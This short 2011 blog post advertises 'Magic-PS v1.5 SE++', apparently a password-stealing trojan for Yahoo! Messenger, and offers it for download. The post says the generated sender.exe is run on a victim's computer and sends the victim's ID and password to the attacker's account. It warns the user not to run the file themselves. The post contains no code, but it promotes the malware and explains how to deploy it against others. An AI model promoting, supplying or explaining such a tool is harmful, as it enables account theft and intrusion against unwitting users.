dimanche 23 octobre 2011

Magic-PS v1.5 SE++

Magic PS v1.5 SE FINAL is a tool to hack yahoo messenger password. You can use it to get password for any yahoo messenger ID. Magic PS v1.5 is a Powerfull Password Sender for Yahoo! Messenger.

Magic PS v1.5 sends victim id %26 pass to your id. It work without any smtp and script
Working tested on Win98, Me, NT, 2000, XP and Vista-7 OSs.

MPS is a Powerfull Password Sender for
Yahoo! Messenger

MPS sends victim id & pass to your id

Work without any smtp and script ;)

Tested on Win98-Me-NT-2000-XP

Risk Risk Risk Risk!!!

After creating MPS (sender.exe) you should not run it !!!!!
MPS sender must be run on victim's system ok

Download Magic-PS v1.5 SE++

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